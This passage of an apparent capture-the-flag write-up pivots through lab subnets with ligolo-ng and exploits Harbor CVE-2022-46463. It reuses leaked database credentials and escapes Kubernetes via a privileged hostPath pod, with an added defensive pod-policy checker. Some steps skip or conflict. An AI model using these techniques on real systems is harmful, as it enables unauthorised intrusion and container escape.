    inet6 fe80::216:3eff:fe12:c479/64 scope link
       valid_lft forever preferred_lft forever
$ cat f1ag03.txt
flag03: flag{6a326f94-6526-4586-8233-152d137281fd}

4. Building the second-layer pivot

IP: 172.28.23.26, second internal interface 172.22.14.6/16
Port: 21, Service: FTP, Vulnerability: FTP anonymous login succeeded
Port: 22, Service: SSH
Port: 80, Service: 新翔OA管理系统 (OA management system)

IP: 172.28.23.33, second internal interface 172.22.10.16/24
Port: 22, Service: SSH
Port: 8080, Service: SpringBoot / 智联科技 ERP, Vulnerability: SpringBoot Env unauthenticated access

Run a ligolo agent on both of these machines so that 172.22.10.16/24 and 172.22.14.6/16 can be routed through them.

Client side (agent, on the target)

./ligolo_agent -bind 0.0.0.0:4446 -ignore-cert

Server side (ligolo-ng proxy)

[Agent : www-data@portal] » connect_agent --ip 172.28.23.33:4446
? TLS Certificate Fingerprint is: E0158D0A4A44DFCAC2FE3A2AAEDFB1D6C71EE0F4126CF30344D6B0C483F65DB1, connect? Yes
INFO[6882] Agent connected.                              id=00163e12c458 name=ops01@ubuntu-erp remote="172.28.23.33:4446"

[Agent : www-data@portal] » session
? Specify a session : 2 - ops01@ubuntu-erp - 172.28.23.33:4446 - 00163e12c458
[Agent : ops01@ubuntu-erp] » interface_create --name gwall2
INFO[6941] Creating a new gwall2 interface...
INFO[6941] Interface created!
[Agent : ops01@ubuntu-erp] » tunnel_start --tun gwall2
INFO[6964] Starting tunnel to ops01@ubuntu-erp (00163e12c458)
[Agent : ops01@ubuntu-erp] » interface_add_route --name gwall2 --route 172.22.10.16/24
INFO[7009] Route created.



[Agent : ops01@ubuntu-erp] » session
? Specify a session :  [Use arrows to move, type to filter]
> 1 - www-data@portal - 39.101.70.161:20000 - 00163e12c400
  2 - ops01@ubuntu-erp - 172.28.23.33:4446 - 00163e12c458
  3 - www-data@ubuntu-oa - 172.28.23.26:4447 - 00163e12c47d

4.1. Host discovery

┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# fping -agq 172.22.14.6/24
172.22.14.6
172.22.14.37
172.22.14.46

┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# fping -agq 172.22.10.6/24
172.22.10.16
172.22.10.28

4.2. Port scan

┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# fscan -h 172.22.14.37
      Fscan Version: 2.0.1

[890ms]     已选择服务扫描模式
[890ms]     开始信息扫描
[890ms]     最终有效主机数量: 1
[890ms]     开始主机扫描
[890ms]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp,
ssh, telnet, vnc, webpoc, webtitle
[890ms]     有效端口数量: 233
[987ms] [*] 端口开放 172.22.14.37:22
[991ms] [*] 端口开放 172.22.14.37:2379
[1.0s] [*] 端口开放 172.22.14.37:10250
[1.0s]     扫描完成, 发现 3 个开放端口
[1.0s]     存活端口数量: 3
[1.0s]     开始漏洞扫描
[1.1s]     POC加载完成: 总共387个,成功387个,失败0个
[1.3s] [*] 网站标题 https://172.22.14.37:10250 状态码:404 长度:19     标题:无标题
[35.3s]     扫描已完成: 5/5
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# fscan -h 172.22.14.46
      Fscan Version: 2.0.1

[897ms]     已选择服务扫描模式
[897ms]     开始信息扫描
[897ms]     最终有效主机数量: 1
[897ms]     开始主机扫描
[897ms]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp,
ssh, telnet, vnc, webpoc, webtitle
[897ms]     有效端口数量: 233
[997ms] [*] 端口开放 172.22.14.46:22
[999ms] [*] 端口开放 172.22.14.46:80
[1.0s]     扫描完成, 发现 2 个开放端口
[1.0s]     存活端口数量: 2
[1.0s]     开始漏洞扫描
[1.1s]     POC加载完成: 总共387个,成功387个,失败0个
[1.1s] [*] 网站标题 http://172.22.14.46       状态码:200 长度:785    标题:Harbor
[1.2s] [*] 发现指纹 目标: http://172.22.14.46       指纹: [Harbor]
[7.0s] [+] 检测到漏洞 http://172.22.14.46:80/swagger.json poc-yaml-swagger-ui-unauth 参数:[{path swagger.json}]
[52.3s]     扫描已完成: 3/3

┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# fscan -h 172.22.10.28
      Fscan Version: 2.0.1

[910ms]     已选择服务扫描模式
[910ms]     开始信息扫描
[910ms]     最终有效主机数量: 1
[910ms]     开始主机扫描
[910ms]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp,
ssh, telnet, vnc, webpoc, webtitle
[910ms]     有效端口数量: 233
[1.0s] [*] 端口开放 172.22.10.28:22
[1.0s] [*] 端口开放 172.22.10.28:80
[1.0s] [*] 端口开放 172.22.10.28:3306
[1.1s]     扫描完成, 发现 3 个开放端口
[1.1s]     存活端口数量: 3
[1.1s]     开始漏洞扫描
[1.1s]     POC加载完成: 总共387个,成功387个,失败0个
[1.2s] [*] 网站标题 http://172.22.10.28       状态码:200 长度:1975   标题:DooTask
[47.4s]     扫描已完成: 4/4
IP: 172.22.14.37
Port: 22, Service: SSH
Port: 2379, Service: etcd
Port: 10250, Service: Kubelet API (Kubernetes)

IP: 172.22.14.46
Port: 22, Service: SSH
Port: 80, Service: Harbor (container image registry)
Vulnerability: Swagger UI unauthenticated access (http://172.22.14.46:80/swagger.json)

IP: 172.22.10.28
Port: 22, Service: SSH
Port: 80, Service: DooTask (open-source project management tool)
Port: 3306, Service: MySQL database
Vulnerability: DooTask management system,

5. flag04 172.22.14.46

IP: 172.22.14.46
Port: 22, Service: SSH
Port: 80, Service: Harbor (container image registry)
Vulnerability: Swagger UI unauthenticated access (http://172.22.14.46:80/swagger.json)

5.1. Harbor unauthenticated access

┌──(root㉿kali)-[~/Desktop/ChunQiu/CloudNet/CVE-2022-46463]
└─# python harbor.py http://172.22.14.46/
[*] API version used v2.0
[+] project/projectadmin
[+] project/portal
[+] library/nginx
[+] library/redis
[+] harbor/secret

┌──(root㉿kali)-[~/Desktop/ChunQiu/CloudNet/CVE-2022-46463]
└─# python harbor.py http://172.22.14.46/ --dump harbor/secret --v2
[+] Dumping : harbor/secret:latest
    [+] Downloading : 58690f9b18fca6469a14da4e212c96849469f9b1be6661d2342a4bf01774aa50
/root/Desktop/ChunQiu/CloudNet/CVE-2022-46463/harbor.py:128: DeprecationWarning: Python 3.14 will, by default, filter extracted tar archives and reject files or modify their metadata. Use the filter argument to control this behavior.
  tf.extractall(f"{CACHE_PATH}{dir}/{name}")
    [+] Downloading : b51569e7c50720acf6860327847fe342a1afbe148d24c529fb81df105e3eed01
    [+] Downloading : da8ef40b9ecabc2679fe2419957220c0272a965c5cf7e0269fa1aeeb8c56f2e1
    [+] Downloading : fb15d46c38dcd1ea0b1990006c3366ecd10c79d374f341687eb2cb23a2c8672e
    [+] Downloading : 413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49
    [+] Downloading : 8bd8c9755cbf83773a6a54eff25db438debc22d593699038341b939e73974653
    
┌──(root㉿kali)-[~/…/CVE-2022-46463/caches/harbor_secret/latest]
└─# cat /root/Desktop/ChunQiu/CloudNet/CVE-2022-46463/caches/harbor_secret/latest/413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49/f1ag05_Yz1o.txt
flag05: flag{8c89ccd3-029d-41c8-8b47-98fb2006f0cf}

6. flag05 172.22.10.28 DooTask

IP: 172.22.10.28
Port: 22, Service: SSH
Port: 80, Service: DooTask (open-source project management tool)
Port: 3306, Service: MySQL database
Vulnerability: DooTask management system,

6.1. mysql

Pull the project/projectadmin image from the Harbor registry.

┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# harbor.py http://172.22.14.46/ --dump project/projectadmin --v2
[+] Dumping : project/projectadmin:latest
    [+] Downloading : 63e9bbe323274e77e58d77c6ab6802d247458f784222fbb07a2556d6ec74ee05
/usr/bin/harbor.py:128: DeprecationWarning: Python 3.14 will, by default, filter extracted tar archives and reject files or modify their metadata. Use the filter argument to control this behavior.
  tf.extractall(f"{CACHE_PATH}{dir}/{name}")
    [+] Downloading : a1ae0db7d6c6f577c8208ce5b780ad362ef36e69d068616ce9188ac1cc2f80c6
    [+] Downloading : 70437571d98143a3479eaf3cc5af696ea79710e815d16e561852cf7d429736bd
    [+] Downloading : ae0fa683fb6d89fd06e238876769e2c7897d86d7546a4877a2a4d2929ed56f2c
    [+] Downloading : 90d3d033513d61a56d1603c00d2c9d72a9fa8cfee799f3b1737376094b2f3d4c


┌──(root㉿kali)-[~/…/Greatwall/caches/project_projectadmin/latest]
└─# find ./  -name run.sh
./90d3d033513d61a56d1603c00d2c9d72a9fa8cfee799f3b1737376094b2f3d4c/run.sh
./70437571d98143a3479eaf3cc5af696ea79710e815d16e561852cf7d429736bd/run.sh

┌──(root㉿kali)-[~/…/Greatwall/caches/project_projectadmin/latest]
└─# cat ./90d3d033513d61a56d1603c00d2c9d72a9fa8cfee799f3b1737376094b2f3d4c/run.sh
#!/bin/bash
sleep 1

# start
java -jar /app/ProjectAdmin-0.0.1-SNAPSHOT.jar
/usr/bin/tail -f /dev/null                                                                                                 
┌──(root㉿kali)-[~/…/Greatwall/caches/project_projectadmin/latest]
└─# cat ./70437571d98143a3479eaf3cc5af696ea79710e815d16e561852cf7d429736bd/run.sh
#!/bin/bash
sleep 1

# start
java -jar /app/ProjectAdmin-0.0.1-SNAPSHOT.jar
/usr/bin/tail -f /dev/null

After extracting the image layers, the site's database credentials can be found inside (the Spring datasource properties of the packaged application):

spring.datasource.url=jdbc:mysql://172.22.10.28:3306/projectadmin?characterEncoding=utf-8&useUnicode=true&serverTimezone=UTC
spring.datasource.username=root
spring.datasource.password=My3q1i4oZkJm3
spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver

mybatis.type-aliases-package=com.smartlink.projectadmin.entity
mybatis.mapper-locations=classpath:mybatis/mapper/*.xml
┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# mysql -h 172.22.10.28 -u root -pMy3q1i4oZkJm3 --skip-ssl
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 511
Server version: 8.0.36-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> SHOW VARIABLES LIKE 'secure_file_priv';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+
1 row in set (0.060 sec)


flag06: flag{413ac6ad-1d50-47cb-9cf3-17354b751741}

7. flag06 172.22.14.37

7.1. k8s API Server unauthenticated access

┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# curl -k https://172.22.14.37:6443/api/v1 | jq '.resources[] | select(.name | in({"pods":1, "secrets":1, "configmaps":1, "nodes":1, "namespaces":1})) | {resource: .name, kind: .kind, verbs: .verbs}'
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 10098   0 10098   0     0 59382     0  --:--:-- --:--:-- --:--:-- 59052
{
  "resource": "configmaps",
  "kind": "ConfigMap",
  "verbs": [
    "create",
    "delete",
    "deletecollection",
    "get",
    "list",
    "patch",
    "update",
    "watch"
  ]
}
{
  "resource": "namespaces",
  "kind": "Namespace",
  "verbs": [
    "create",
    "delete",
    "get",
    "list",
    "patch",
    "update",
    "watch"
  ]
}
{
  "resource": "nodes",
  "kind": "Node",
  "verbs": [
    "create",
    "delete",
    "deletecollection",
    "get",
    "list",
    "patch",
    "update",
    "watch"
  ]
}
{
  "resource": "pods",
  "kind": "Pod",
  "verbs": [
    "create",
    "delete",
    "deletecollection",
    "get",
    "list",
    "patch",
    "update",
    "watch"
  ]
}
{
  "resource": "secrets",
  "kind": "Secret",
  "verbs": [
    "create",
    "delete",
    "deletecollection",
    "get",
    "list",
    "patch",
    "update",
    "watch"
  ]
}

This shows that the API server allows unauthenticated (anonymous) access with full verbs on pods, secrets, configmaps, nodes and namespaces.

┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods -o jsonpath='{.items[*].spec.containers[*].image}'
Please enter Username: 1
Please enter Password: nginx nginx:1.8 k8s.gcr.io/pause:3.6

Create a malicious pod from the nginx image and use it to escape to the node.

#everything-allowed-exec-pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-exec-pod
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-pod
    image: nginx:1.8
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  volumes:
  - name: noderoot
    hostPath:
      path: /
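The manifest above combines every setting that the Pod Security Standards "baseline" level forbids: host network/PID/IPC namespaces, a privileged container and a hostPath mount of `/`. The following added example (not code from the original write-up or from any Kubernetes project) is an admission-style checker that applies those baseline controls to a pod manifest. It is run on a Python-dict copy of the page's own pod and on a hardened nginx pod; a real checker would load the YAML with `yaml.safe_load`, which is avoided here so the example runs on the standard library alone. The hardened pod is constructed for the example.

```python
# Copy of the everything-allowed-exec-pod manifest from this write-up, as a dict.
PAGE_POD = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "everything-allowed-exec-pod", "labels": {"app": "pentest"}},
    "spec": {
        "hostNetwork": True,
        "hostPID": True,
        "hostIPC": True,
        "containers": [{
            "name": "everything-allowed-pod",
            "image": "nginx:1.8",
            "securityContext": {"privileged": True},
            "volumeMounts": [{"mountPath": "/host", "name": "noderoot"}],
            "command": ["/bin/sh", "-c", "--"],
            "args": ["while true; do sleep 30; done;"],
        }],
        "volumes": [{"name": "noderoot", "hostPath": {"path": "/"}}],
    },
}

# Constructed hardened counterpart: same image, no host namespaces, no privilege,
# an emptyDir instead of a hostPath, all capabilities dropped.
HARDENED_POD = {
    "apiVersion": "v1",
    "kind": "Pod",
    "metadata": {"name": "nginx-hardened"},
    "spec": {
        "containers": [{
            "name": "nginx",
            "image": "nginx:1.8",
            "securityContext": {
                "privileged": False,
                "allowPrivilegeEscalation": False,
                "capabilities": {"drop": ["ALL"]},
            },
            "volumeMounts": [{"mountPath": "/cache", "name": "cache"}],
        }],
        "volumes": [{"name": "cache", "emptyDir": {}}],
    },
}

# Capabilities a container may add under the PSS baseline profile.
BASELINE_ALLOWED_CAPS = {
    "AUDIT_WRITE", "CHOWN", "DAC_OVERRIDE", "FOWNER", "FSETID", "KILL", "MKNOD",
    "NET_BIND_SERVICE", "SETFCAP", "SETGID", "SETPCAP", "SETUID", "SYS_CHROOT",
}


def _all_containers(spec):
    """Yield init, regular and ephemeral containers; all of them are checked."""
    for key in ("initContainers", "containers", "ephemeralContainers"):
        for c in spec.get(key) or []:
            yield c


def pod_security_violations(manifest):
    """Return a list of human-readable baseline violations (empty when the pod is clean)."""
    spec = manifest.get("spec") or {}
    violations = []
    # Host namespaces give the container the node's network, process list and IPC.
    for field in ("hostNetwork", "hostPID", "hostIPC"):
        if spec.get(field):
            violations.append(f"spec.{field} is true")
    # hostPath exposes the node filesystem; "/" is the worst case.
    for vol in spec.get("volumes") or []:
        if "hostPath" in vol:
            path = (vol["hostPath"] or {}).get("path")
            violations.append(f"volume {vol.get('name')!r} mounts hostPath {path!r}")
    for c in _all_containers(spec):
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            violations.append(f"container {c.get('name')!r} is privileged")
        extra = set((sc.get("capabilities") or {}).get("add") or []) - BASELINE_ALLOWED_CAPS
        if extra:
            violations.append(f"container {c.get('name')!r} adds capabilities {sorted(extra)}")
        for port in c.get("ports") or []:
            if port.get("hostPort"):
                violations.append(f"container {c.get('name')!r} binds hostPort {port['hostPort']}")
    return violations


if __name__ == "__main__":
    for pod in (PAGE_POD, HARDENED_POD):
        name = pod["metadata"]["name"]
        found = pod_security_violations(pod)
        print(f"{name}: {'OK' if not found else str(len(found)) + ' violation(s)'}")
        for v in found:
            print("  -", v)
```

The built-in way to get the same result is Pod Security Admission: labelling the namespace with `pod-security.kubernetes.io/enforce: baseline` makes the API server reject this pod outright, independent of who submits it. That complements rather than replaces fixing the anonymous access itself, since an attacker who can create pods can still do plenty inside a baseline-compliant one.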

┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ apply -f k8s.yaml
Please enter Username: 1
Please enter Password: pod/everything-allowed-exec-pod configured

┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ get pods
Please enter Username: 1
Please enter Password: NAME                                READY   STATUS             RESTARTS   AGE
everything-allowed-exec-pod         1/1     Running            0          4m47s

Exec into the container and escape to the host

┌──(root㉿kali)-[~/Desktop/ChunQiu/Greatwall]
└─# kubectl --insecure-skip-tls-verify -s https://172.22.14.37:6443/ exec -it everything-allowed-exec-pod  -- /bin/bash
Please enter Username: 1
root@ubuntu-k8s:/#
root@ubuntu-k8s:/mnt# cd /host
root@ubuntu-k8s:/host# ls
bin   dev  home        initrd.img.old  lib64       media  opt   root  sbin  sys  usr  vmlinuz
boot  etc  initrd.img  lib             lost+found  mnt    proc  run   srv   tmp  var  vmlinuz.old
root@ubuntu-k8s:/host# chroot /host
# netstat -lnpt
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 172.22.14.37:2379       0.0.0.0:*               LISTEN      3108/etcd
tcp        0      0 127.0.0.1:2379          0.0.0.0:*               LISTEN      3108/etcd
tcp        0      0 127.0.0.1:33675         0.0.0.0:*               LISTEN      648/kubelet
tcp        0      0 172.22.14.37:2380       0.0.0.0:*               LISTEN      3108/etcd
tcp        0      0 127.0.0.1:2381          0.0.0.0:*               LISTEN      3108/etcd
tcp        0      0 127.0.0.1:10257         0.0.0.0:*               LISTEN      3079/kube-controlle
tcp        0      0 127.0.0.1:10259         0.0.0.0:*               LISTEN      3060/kube-scheduler
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      525/systemd-resolve
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      746/sshd
tcp        0      0 127.0.0.1:10248         0.0.0.0:*               LISTEN      648/kubelet
tcp        0      0 127.0.0.1:10249         0.0.0.0:*               LISTEN      3680/kube-proxy
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      937/mysqld
tcp6       0      0 :::10251                :::*                    LISTEN      3060/kube-scheduler
tcp6       0      0 :::6443                 :::*                    LISTEN      3078/kube-apiserver
tcp6       0      0 :::10252                :::*                    LISTEN      3079/kube-controlle
tcp6       0      0 :::10256                :::*                    LISTEN      3680/kube-proxy
tcp6       0      0 :::10250                :::*                    LISTEN      648/kubelet

The last flag is retrieved from the database

# mysql -uroot -p''
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 6
Server version: 5.7.42-0ubuntu0.18.04.1 (Ubuntu)

Copyright (c) 2000, 2023, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| flaghaha           |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.00 sec)

mysql> use flaghaha;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+--------------------+
| Tables_in_flaghaha |
+--------------------+
| flag04             |
+--------------------+
1 row in set (0.00 sec)

mysql> select * from flag04;
+------+--------------------------------------------------------------+
| id   | f1agggggishere                                               |
+------+--------------------------------------------------------------+
|    1 | ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg== |
+------+--------------------------------------------------------------+
1 row in set (0.00 sec)

mysql> exit
Bye
# echo -n 'ZmxhZ3tkYTY5YzQ1OS03ZmU1LTQ1MzUtYjhkMS0xNWZmZjQ5NmEyOWZ9Cg==' |base64 -d
flag{da69c459-7fe5-4535-b8d1-15fff496a29f}

8. Reference: